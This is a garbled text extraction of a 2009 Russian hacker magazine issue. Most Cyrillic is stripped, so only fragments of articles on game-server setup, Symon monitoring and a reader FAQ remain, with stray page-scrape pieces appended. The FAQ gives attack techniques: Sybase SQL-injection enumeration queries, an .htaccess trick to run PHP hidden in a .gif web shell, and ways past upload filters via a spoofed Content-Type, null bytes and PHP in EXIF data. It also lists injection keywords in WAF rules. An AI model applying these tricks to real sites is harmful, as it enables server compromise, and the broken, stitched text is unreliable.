# MySQL hostname;port;username;password;database
# ,

LoginDatabaseInfo = "127.0.0.1;3306;mangos;mangos;realmd"
# , PID-
LogFile = "Realmd.log"
LogsDir = "/var/log"
PidFile = "/var/run/realmd.pid"
# ,
RealmServerPort = 3724
BindIP = "0.0.0.0"
mangosd.conf :
$ sudo nano /usr/local/etc/mangosd.conf
LoginDatabaseInfo = "127.0.0.1;3306;mangos;mangos;realmd"
WorldDatabaseInfo = "127.0.0.1;3306;mangos;mangos;mangos"
CharacterDatabaseInfo = "127.0.0.1;3306;mangos;mangos;ch
aracters"
MaxPingTime = 30
WorldServerPort = 8085
BindIP = "0.0.0.0"
mangos/contrib/extractor AD, ( Linux Windows).

(AD.exe), .
(, mangos.ru) dbc- /usr/local/share/mangos/dbc:
$ cd /usr/local/share/mangos
$ mkdir dbc; cd dbc
$ sudo unrar e ~/dbc.rar
WOW AD.exe,
maps . maps /usr/local/share/mangos.
X 03 /123/ 09
>> SYN/ACK
links
Game Scanner
Quice
vmaps, WoW
vmap_extract_assembler_bin ( MaNGOS)
makevmaps_SIMPLE.
bat. vmaps,
, maps.
:
$ sudo /usr/local/bin/mangos-realmd
$ sudo /usr/local/bin/mangos-worldd
, . ,
, ( ). ,
, nice -n -20. ,
,
Sourceforge . , MaNGOS
DB Terminal (sf.net/projects/mdbt), - MWFv3
(mangos-wf-v3.sf.net). ,
, , Quice (quice.indomit.
ru). WotLK (MaNGOS Beta
Server, sf.net/projects/wotlkmangosbeta), MaNGOS .
ALL OF DUTY 4
Call of Duty 4 :
, , , -
. , icculus.org/news/
news.php?id=4095, Download cod-4.ru www.callofduty.ru/forum ( Linux).
Windows Linux,
Full .
, Full .
,
DVD- . :
cod4-linux-server-11212007.tar.bz2
$ tar xjvf cod4-linux-server-11212007.tar.bz2
(cod4_lnxded, cod4_
lnxded-bin, libgcc_s.so.1, libstdc++.so.6),
chmod +x .
Setup/Data
cod4.
6.5 .
main , .iwd,
video, Mods ( mods), zone
localization.txt. ,
zone. ! - PunkBuster:
$ ./pbsetup.run -e
$ ./pbsetup.run --add-game=cod4 --add-gamepath=/where/i/uploaded/cod4/
$ ./pbsetup.run -u
, pbsetup.run ,
www.punkbuster.com.
:
, MaNGOS:
getmangos.com
ytdb.kanet.ru
forum.1wow.ru
mangos.ru
mangos.org.ru
,
COD:
www.callofduty.ru
cod-4.ru
legion-rus.clan.su
info

SourceForge.net

MaNGOS COD.
Counter Strike
Linux
#051.
$ sudo ./cod4_lnxded
,
+set loc_language 6.
IP-, , (, Punkbuster ,
;
, ):
$ sudo ./cod4_lnxded +set dedicated 1 +set
net_ip 192.168.1.158 +set net_port 28960 +exec
server.cfg +map_rotate +set sv_punkbuster 1
+set loc_language 6
+set dedicated 1
, +map_rotate .
main. netstat/sockstat :
$ mkdir cod4; cd cod4

$ sockstat | grep cod4
, icculus.org. (
3 ) :
$
wget
X 03 /123/ 09
-c
http://0day.icculus.org/cod/
root cod4_lnxde 63855 24 udp4 192.168.1.158:28960 *:*
,
(20500, 29900, 20510 28960).
. z
133
>> SYN/ACK
SERGEY JAREMCHUK
ANDREY MATVEEV
SYMON:
, .

. ,
, , . Symon , ,
.
SYMON
Symon (www.xs4all.nl/~wpd/symon)
OpenBSD, FreeBSD,
NetBSD Linux. BSD- , , .
CPU, , , ,
PF . , Symon
- . ,
. :
symon ,
. ,
(CPU, ),
.
chroot.
symux symon RRD-.
134
symux , , , .
:
syweb PHP-, RRDtool .
sylcd , LCD- (
CrystalFontz HD44780).
SymuxClient.pm Perl, getsymonitem.pl.
. ,
phpSymon (www.ryanflannery.net/works/phpsymon), syweb, .
FreeBSD. ,
, , .
:
X 03 /123/ 09
>> SYN/ACK
tcpdump?
Syweb
# cd /usr/ports/sysutils/symon
# make install clean
Symon, ,
RRDTool. :
# pkg_info | grep symon
symon-2.79_1 Performance
tool
and
information
monitoring
! .
SYMON
symon symux symon.conf symux.conf. /etc/:
# cp -v /usr/local/share/examples/symon/*.conf /etc/
. symon /etc/symon.conf. :
monitor "{" resources "}" [every] "stream" ["from" host]
["to"] host [ port ]
, , 2100
( UDP):
monitor {cpu(0), mem, if(lo0), io(wd0)} stream to 127.0.0.1 2100
, ,
. . symon(8). :
cpu/cpuiow (idle, user, nice, system,
interrupt), iowait cpuiow. 100,
2.
df .
if ( / , , , ).
io .
mem .
pf/pfq PF ( , ) ALTQ.
sensor , , . .
proc .
, OpenBSD, iptables ipfw,
pf. , X 03 /123/ 09
: fatal: pf module not available.

, proc
. proc ps, ifconfig. fdisk dmesg.
, sysctl hw.sensors.
,
c_config.sh. ,
(
, io , CPU ):
# /usr/local/share/symon/c_config.sh > /etc/symon.conf
.
, , ,
, MySQL Clamd, :
# vi /etc/symon.conf
monitor{cpu(0),mem,mbuf,pf,df(sd0a),df(sd0d),df(sd0e),
sensor(lm0.temp0), sensor(lm0.temp1), sensor(lm0.fan0),
proc(squid), proc(httpd), proc(spamd), proc(mysqld),
proc(clamd),
if(fxp0), if(fxp1), if(fxp2), if(tun0),
io(wd0), io(wd1)
} stream to 127.0.0.1 2100
,
localhost IP- ( DNS-), : stream to 192.168.10.10 2100 (
). , 5 . ,
, time
. :
# /usr/local/libexec/symon -t
/etc/symon.conf: ok
, . symon , , .
,
'-d' 'u':
# /usr/local/libexec/symon -d -u
symon version 2.79
program id=9530
debug: symon packet size=362
sending packets to udp 127.0.0.1 2100
135
>> SYN/ACK
Symux -d
Syweb
started module io(wd0)
. ,
:
# /usr/local/libexec/symon
,
tcpdump i lo0
2100 , /var/run/
symon.pid symon ps au.
symon :
# vi /etc/rc.local
if [ -x /usr/local/libexec/symon ]; then
echo 'starting symon'; /usr/local/libexec/symon
fi
# symon
, :
# /usr/local/libexec/symux -t
warning: /etc/symux.conf:7: file '/var/www/symon/rrds/
localhost/df_sd0e.rrd', guessedannot be opened
warning: /etc/symux.conf: no filename specified for stream
'df(sd0e)'
, , , . , :
# mkdir -p /var/www/symon/rrds/localhost
, !
SYMUX
Symux. symux.conf
, , /, .
:
symux RRD-. c_smrrds.sh,

symon. :
c_smrrds.sh [oneday] [interval <seconds>] [all] <rrd files>
:
# vi /etc/symux.conf
# symon
# mux 192.168.10.10 2100
mux 127.0.0.1 2100
#
source 127.0.0.1 {
accept {
# , (
symon.conf)
cpu(0), mem, mbuf, pf, df(sd0a), df(sd0d), df(sd0e),
sensor(lm0.temp0), sensor(lm0.temp1), sensor(lm0.fan0),
proc(squid), proc(httpd), proc(spamd), proc(mysqld),
proc(clamd),
if(fxp0), if(fxp1), if(fxp2), if(tun0),
io(wd0), io(wd1)
}
# ,
datadir "/var/www/symon/rrds/localhost"
#
# write sensor(lm0.fan1) in "/var/www/symon/rrds/
localhost/sensor_lm0.fan0.rrd"
}
136
# cd /usr/local/share/symon/
# ./c_smrrds.sh all
. :
# /usr/local/libexec/symux -t
/etc/symux.conf: ok
, symux :
# vi /etc/rc.local
if [ -x /usr/local/libexec/symux ]; then
echo 'starting symux'; /usr/local/libexec/symux
fi
, symon, .
, -l ,
.
, -d.
# /usr/local/libexec/symux -d
X 03 /123/ 09
>> SYN/ACK
links

Symon www.xs4all.
nl/~wpd/symon.

- ,
( Free/OpenBSD
www):

phpSymon www.
ryanflannery.net/
works/phpsymon.
# chown -R www:www /var/www/syweb/

# chown -R www:www /var/www/symon/
phpSymon
debug:
rrdupdate
/var/www/symon/rrds/
localhost/df_sd0e.rrd
1233494631:15630616:8801288:8801288:0:0:0:0
. - .

, .
( SymuxClient.pm getsymonitem.pl)
/usr/local/share/symon/client.
;
:
./getsymonitem.pl <symux host> <symux port>
<measured host> <stream> <item>
# cd /usr/local/share/symon/client
# ./getsymonitem.pl 127.0.0.1 2100 127.0.0.1
'cpu(0)' user
12.80
man 8 symux. CPU : user, nice,

system, interrupt, idle.
, PHP, syweb phpSymon.
Apache + PHP,
, . syweb:
# wget -c http://www.xs4all.nl/~wpd/symon/
philes/syweb-0.58.tar.gz
# tar zxf syweb-0.58.tar.gz
htdocs symon
DocumentRoot -:
# cd syweb
# cp -rv htdocs/syweb /var/www
# cp -rv symon /var/www
X 03 /123/ 09
syweb/setup.inc .
Free/OpenBSD ( chroot ):
# vi /var/www/syweb/setup.inc
$symon['rrdtool_path']='/usr/local/bin/
rrdtool';
$symon['cache_dir']='/var/www/symon/cache';
$symon['host_tree']='/var/www/symon/rrds';
$symon['layout_dir']='/var/www/symon';
,
:
video

,
,
symon
.
# mkdir /var/www/symon/cache
# chown www:www /var/www/symon/cache
- chroot, , install_rrdtool.sh,
rrd chroot-.
, http://localhost/syweb
. , .
PF.
,
.htaccess:
# vi /var/www/syweb/.htaccess
AuthName "Syweb zone"
AuthType Basic
AuthUserFile
/usr/local/etc/apache/httpd_
access
require valid-user
htpasswd,
Apache:
# htpasswd -c
access admin
/usr/local/etc/apache/httpd_
, Symon ,
. z
info
proc
ps,

ifconfig,

fdisk dmesg.

,

sysctl hw.sensors.

RRDTool

(z_11_2008).
137
>> units
CORWIN
STEP
/ CORWIN88@MAIL.RU /
FAQ UNITED:
Q: Sybase , INFORMATION.SCHEMA.Tables(columns)?
A: Sybase sysobjects.
.
( ,
,
) select name from bd..
sysobjects where type=U. bd ,
. U ,
,
. ,
hex- U 0x55. (...)
where type=0x55.
Q: ?
A: : select dbname
from master..syslogins.
select dbname from master..syslogins
where dbname not in (_hex__ __).
,
, hex.
: select dbname from master..syslogins
where dbname not in (db1___hex,db2_
__hex,...). :
138
select dbname from master..syslogins where

dbname not in (0x646231,0x64626e616d6532,...).
Q:
MD5-.
?
A: , , . http://hashchecker.com.
: (50 )
$15, (100 ) $25.
Rainbow ( , 196 16 DVD
$500).
Q: .

?
A:
John The Ripper Distributed John
(http://freshmeat.net/projects/djohn).
Q: WEP
Windows Mobile?
A: WMobile monitor
mode, WiFi-
.
Q: .htaccess -
( IP-
)?
A: Ronald van den Heetkamp
:
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING}
(|%22).*(>|%3E|<|%3C).* [NC]
RewriteRule ^(.*)$ log.php [NC]
(<|%3C).*script.*(>|%3E) [NC]
(javascript:).*(;).* [NC]
(;|'|"|%22).*
(union|select|insert|drop|
update|md5|benchmark|or|and|
if).*[NC]
RewriteRule (,|;|<|>|'|`)
/log.php [NC]
X 03 /123/ 09
>> units
Q: PHP
-,
( ).
?
A: ,
PHP :). ,

. ,

HTTP.
. .
Q: SSH?
A:
ip-,

. BlockSSHD (http://
blocksshd.sourceforge.net). , .
(/etc/blocksshd/blocksshd.conf)
:
max_attempts => '4'
// ;
unblock => '1'
// , ip ;
send_email => '1'
// email (0 );
email => 'mymail@mail.com'
// email;
email_whois_lookup => '0'
//
whois email;
:
-d | --daemon | --start
//
--stop
-h | --help
-v | --version
Q: ,
. ,

php, perl cgi.
-?
A: , . -, , gif, .htaccess :
<Files shell.gif>
AddType application/
x-httpd-php .gif
</Files>
, .
X 03 /123/ 09
Q: , ,
- , ?
A:
.
(
).
,
cgi
(
,
, ). Content-Type.
:
<?php
if($_FILES['userfile']
['type']!="image/gif"){
echo 'Error!';
exit;
}

, Content-Type:
text/plain, MIME-
.
Content-Type:
image/gif.
move_uploaded_file
copy. -, ,
null- (%00, \x00). ,
, , :
<?php
//
if ($allowed)
{
//
move_uploaded_file
($_FILES[userfile]
[tmp_name], $uploadfile);
echo Uploaded!;
}
else {
echo Error!;
}
?>
php-,
, null- (shell.php%00.jpg),
.
, -
getimagesize. getimagesize()
GIF, JPG,
PNG, SWF, PSD, TIFF BMP , /.
, :
<?php
$imageinfo=
getimagesize($)FILES['userfile']
['tmp_name']);
if
($imageinfo['mime']
!='image/gif'
&& imageinfo['mime']
!= 'image/ jpeg') {
echo 'Error!';
exit;
}
//
?>
, EXIF-
(,

, ACDSee ..)
-, php,
Content-Type
.
,
.
Q:
?
A: ,
base64
. ,
XOR- .
, ,
, .
. Suhosin (http://hardenedphp.net/suhosin),
:
sql-injection
cookie

eval()
preg_replace /e
phpinfo()

null-byte
HTTP
Response Splitting
?
suhosin!
,
; ,
..
139
>> units
Q: XSS
cookies. ?
A: , , ,

.
Q: CMS, -, . . ?
A: Register_
globals. -
, .
,
,
,
.
. ,
:). ,

, advisory (

).
Q:
. ,
:
. , 3G-,
Samsung WiMax
Yota.
, , ,
.
Ubuntu?
A: , ,
, madwimax
(http://code.google.com/p/madwimax). ,
-
Linux- Samsung SWC-U200 USB Mobile Wimax.
user-space,
,
libusb-1.0.
:
Linux, .
?
:
1. :
sudo path/to/wimax
.
State: NORMAL, :
140
. 3.
2. :
sudo ifconfig tap0 up
3. :
sudo dhclient tap0
.
, .

habrahabr.ru/blogs/WiMAX/50504.
Q:
,
Linux?
A: ! ,
Windows XP:
1.
USB, , VirtualBox (www.
virtualbox.org).
2.
.
3.
:
sudo tunctl -t tap0 -u zero
sudo ifconfig tap0 192.168.0.1 up
sudo chmod 0666 /dev/net/tun
4. VirtualBox , host interface tap0.

5. .
6. XP
IP: ,
192.168.0.1.
7.
proxy-. SmallProxy
(smallproxy.ru).
8. USB- ,
, .
9.
Yota.
10.

192.168.0.1:3128.
Q: RSS-
( Google Reader)
. ,
,
friends only.
?
A: .
,
,
RSS-.
Yahoo Pipes
(pipes.yahoo.com),
. ,
?
,
RSS Proxy (http://rss-proxy.darkk.
net.ru).
RSS-,
,
. ,
, : http://github.
com/darkk/rss-proxy.
Q: SMS- XMPP
(Jabber)?
A:
,
XMPP. , ,
. :

,
Python Clickatell Bulk SMS
Gateway (www.clickatell.com),
IP. MessagingBay (http://
www.messagingbay.com),
. ( , ) .
, , .
? :
1. Mail.ru.
2. jabber- mail.ru jabber.ru.
3. jabbera ,

SMS.
: 50
:).
Q: , ][
RIA-.

,
?
A: . Adobe
Labs
Distributable Player (http://labs.adobe.com/
technologies/distributableplayer), ,
, RIA-
.
:
Flash Lite 3.1 Distributable Player.
.
Adobe Mobile Packager. , SWF - Windows Mobile
Symbian S60.

! z
X 03 /123/ 09

2100 . ( 15%
)
. ,

!
!

+ + DVD:
- 155 ( 25% , )
12
3720
2100
+DVD 6
1200 .
1. ,
, www.
glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
:

;
20
.
,
.
, . ,
, .
, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru
>Multimedia
aTunes 1.12.0 Solano
GIMP for Windows 2.6.5
ICY Radio 0.5
MorphVOX Junior 2.7.2
MorphVOX Pro - Voice Changer 4.2.8
Open Subtitle Editor 0.1.2
Picasa 3
Songbird 1.0
>Misc
BatteryBar v3.1 Beta
Executor 0.98.56
Eyes Relax 0.44
Fast Duplicate File Finder 1.1.0.0
FruitfulTime ProductivityMeter
HoeKey 1.13
KGB Archiver 2
KSoft's SmartUp Menu 0.1.1
Mac Finder Toolbar for Windows
0.3.2
Plates 1.10
RBTray 3.3
SpellChecker 2.1.0.115
Synergy 1.3.1
The Guide 2.0
timeEdition 1.1.4
TNR CodeExpert
TNR MoonLight -
1.3.46
Visual Task Tips 3.4
>Development
Carbide ++ 2.0
Groovy 1.6
HTTP Debugger Pro 3.2
IntelliJ IDEA 8.1
MySQL GUI Tools 5.0-r17
Perl Dev Kit (PDK) 8.0.0.289618
RJ TextEd 4.81
S60 Platform SDK
VB Decompiler 7.1
>>WINDOWS
>Dailysoft
7-Zip 4.65
Autoruns 9.37
DAEMON Tools Lite 4.30.3
Download Master 5.5.9.1157
FarPowerPack 1.15
FileZilla Client 3.2.2.1
IrfanView 4.23
JDataSaver
K-Lite Mega Codec Pack 4.7.0
Miranda IM 0.7.17
Mozilla Firefox 3.0.6
Notepad++ 5.2
Opera 9.64
PuTTY 0.60
QIP Infium RC4, Build 9026
Skype 4.0
Total Commander 7.04a
Unlocker 1.8.7
Winamp 5.55
Xakep CD DataSaver 5.2
>>UNIX
Desktop
Day Planner 0.9.2
Kino 1.3.3
PeaZip 2.5
Bash 4.0
Keryx 0.92
GIMP 2.6.5
PinkyTagger 2.2
MC 4.6.2
Compiz 0.8.0
OpenOffice 3.0.1
man-pages 3.19
Mkvtoolnix 2.5.1
GWhere 0.2.3
AcetoneISO 2.0.3
>System
Easy AutoInstaller 2.1
Gizmo Central 2.7.3
HD Tune Pro 3.50
InstallPad 0.4
Nero BackItUp 4
Secunia Personal Software Inspector
1.0.0.3
SyncBackPro 5.3.0.18
Vombato Mail Drive 1.3
>Security
Attack Testing Platform
BtProx 1.3.4
CryptoTunnel 2.0
DShield Web honeypot Alpha
FlowMatrix
HookExplorer
IBM Rational AppScan Standard
Edition V7.8
KeePass 1.15
Malcode Analysys Pack
MultiPlot
PTSecurity Microsoft Patches
Network Scanner
Rising Internet Security 2009
21.22.30
SSA 1.2
Sunbelt Network Security Inspector
1.6.52
SysAnalyzer
Xspider 7.7.3100
>Net
BitKinex 3.0.9
Digsby Build 49
Dropbox 0.6.402
GhostWall FireWall 1.150
MyConnection PC 3.0b
PC Tools Firewall Plus 5
Safari 4beta
toonel.net 0.0.50.50
WinGate 6.5.2
Zimbra Desktop 1.0
Sweet Home 3D 1.6

VirtualDub 1.9.0
ZS4 Video Editor 0.958
>Security
AIM Sniff 1.0b
Aircrack-ng 1.0 rc2
Arpalert 2.0.11
Chkrootkit 0.48
Ettercap 0.7.3
GreenSQL 0.9.4
John the Ripper 1.7.3.1
Kismet 2008.05-R1
Nmbscan 1.2.5
>Net
aria2 1.2.0
Arora 0.5
Darkstat 3.0.711
FileZilla 3.2.2
Firefox 3.0.6
KTorrent 3.2
Liferea 1.4.26
Miro 2.0
Opera 9.63
Quassel 0.4.0
qutIM 0.1.99
Skype 2.0.072
streamtuner2 1.9.8
Transmission 1.51
Tucan 0.3.4
>Games
Pingus 0.7.2
World of Goo 1.4.0
>Devel
Automake 1.10.2
Bespin
Biew 5.7.3.1
Boost 1.38.0
Eric 4.3.0
Fingerprint Verification System 0.1.0
GCC 4.3.3
Glade 3.4.0
Google Web Toolkit 1.5.3
Groovy 1.6
GTK+ 2.14.7
haXe 2.02
IntellijIDEA 8.1
Libjpeg 6b
Moonlight 1.0
Navicat 8.0.28
Qt 4.4.3
Ruby 1.9.1
zlib 1.2.3
Picasa 3.0 beta

:
Amora 1.1
Cibyl 2.0
Gammu+ 0.40
gnokii 0.6.27
j2megl 0.0.7
Moccatroller 1.8
obexfs 0.11
SieFS 0.5
SMSTerm 0.6.1
Wammu 0.29
>X-distr
Debian 5.0 Lenny
>System
Bootchart 0.9
FreeRemote 0.1.3
Likewise Open 5.1.0
Linux Kernel 2.6.28.7
NVClock 0.8
nVidia Linux Display Driver x86
180.35
Parted Magic 3.7
RPM 4.6.0
Shake 0.99
SmbSync 1.0
System Rescue CD 1.1.5
VirtualBox 2.1.4
Wine 1.1.16
>Server
Bind 9.6.0
Cups 1.4
DBMail 2.3.5
Dhcp 4.1.0
DSPAM 3.8.0
FreeRemoted 0.14
Jabberd 2.2.7.1
NSD 3.2.1
OpenLDAP 2.4.15
OpenSSH 5.2
Postfix 2.5.6
Sarg 2.2.5
Sendmail 8.14.3
Snort 2.8.3.2
SQUID 3.0 STABLE13
Yaass Project 0.8.9
Ziproxy 2.6.9
OpenStego 0.5.1
p0f 2.0.8
Pam_usb 0.4.2
sqlmap 0.6.4
Sshguard 1.4rc2
THC-Amap 5.2
THC-Hydra 5.4
THC-pptp-bruter 0.1.4
03(123) 2009
http://
WWW2
2

TORRENT-
OPENTRACKERS
WWW.OPENTRACKERS.FR

-. , ( ). , ,
.
opentrackers.
RSS.
WAKOOPA
WAKOOPA.COM
, ,
, Warcraft
III, .
. :). , ,
, ,
.
144

IT-
IT MANAGER 3
ITMANAGER3.INTEL.COM
, , .
IT Manager Intel IT-. , IT- ,

.
SKYFEX
SKYFEX.COM

. , - ActiveX
Internet Explorer, :
, . , SkyFex
.
SOS, . , .
X 03 /123/ 09

Хакер 2009 03 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2009 03 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

: iPhone

038 Easy Hack

138 FAQ United

/ .: (495) 935-7034, : (495)

Android Windows Mobile 5.0,

Mobile World Congress, ,

ASUS Crosshair II Formula

: NVIDIA nForce 780a SLI

Biostar TA790GX A2+

Biostar TA790GX A2+

ASUS Crosshair II Formula

Biostar TA790GX A2+

: AMD Phenom/Phenom X4/Phenom

Foxconn A7DA-S 790GX. -,

, from:nikitoz label: is:unread

API -. hello world!,

(twitter.com/downloads) . PC, , iPhone/iTouch, Google

NTFS HP: HP USB Disk Storage Format Tool (

HDD HP USB Disk

extension. IIS Manager

return okresp, reason, headers.get("Server")

0 processes are in complain mode.

Postgree SQL 8.1 UDF . , :

PGP DESKTOP 9.0.6

Web Application Security Consortium.

, CMS, , , white-box. All-In-One ,

apache AllowOverride None, FilesMatch

. Apple Apple iPhone. , , !

1. INSTALLER REPOSITORY SPOOFING

_sshd:*:75:75::0:0:sshd Privilege separation:/var/empty:/

<?xml version="1.0" encoding="UTF-8"?>

<td colspan="2" >

<iframe src="http://ya.ru" />

<meta http-equiv="Refresh" content="1;

message (ID )|unread_count (- ).

web- Enthusiast Internet

Enthusiast Internet Award ,

. , , . WPA ... , WEP! ,

weplab ( --perc). 80%

. 1.000.000 128- WEP-

1. Cant open file: tbl_name.MYD

Metal Gear Solid 4: Guns of the Patriots

DRM (Digital rights management), ,

Custom apt-get (install) Apply.

Linux Kernel Summit 2007

802.11s, Open80211s (www.open80211s.org).

Changelog Linux 5.7

UWB (Ultra Wide Band), - (3.1-10.6 )

Emacs IDE Python

Premium SMS 0,5 $ 5$ , ( ) .

START RESOURCE 12345678.rss

commDB . ( CApSelect SDK). .

iUri url , , iIapId , .

, map(operator.add, l1, l2), , , map(lambda x,y: x+y, v1, v2).

2001 Python 1.5

6. . for, while, repeat, forever.

integer, time, real .

var1 var2, . , 8b1001_0110,

PPTP- WINDOWS SERVER 2008

PAP, CHAP, MSCHAP-v2 EAP-TLS (

Server). DHCP DNS. ,

> Netsh ras add authtype PAP|MD5CHAP|MSCHAPv2|EAP

GRANT USAGE ON . TO 'mangos'@'localhost' IDENTIFIED BY

root cod4_lnxde 63855 24 udp4 192.168.1.158:28960 :